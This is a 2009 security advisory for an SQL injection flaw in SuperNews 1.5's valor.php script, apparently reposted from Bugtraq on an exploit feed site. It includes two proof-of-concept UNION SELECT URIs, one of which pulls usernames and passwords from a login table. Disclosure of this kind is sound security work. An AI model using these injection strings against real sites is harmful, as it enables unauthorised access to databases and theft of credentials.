|
Feeds -
Exploits
|
|
Written by p3s0k!
|
|
Monday, 23 March 2009 22:11 |
SuperNews 'valor.php' SQL Injection Vulnerability
-\\Bugtraq ID: 34195
-\\Class: Input Validation Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Mar 23 2009 12:00AM
-\\Updated: Mar 23 2009 12:00AM
-\\Credit: p3s0k!
-\\Vulnerable: SuperNews SuperNews 1.5
-\\Discussion SuperNews is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SuperNews 1.5 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s): Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5-- http://www.example.com/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--
-\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s) --SuperNews 1.5 SQL Injection in valor.php http://www.milw0rm.com/exploits/825 (p3s0k!)
|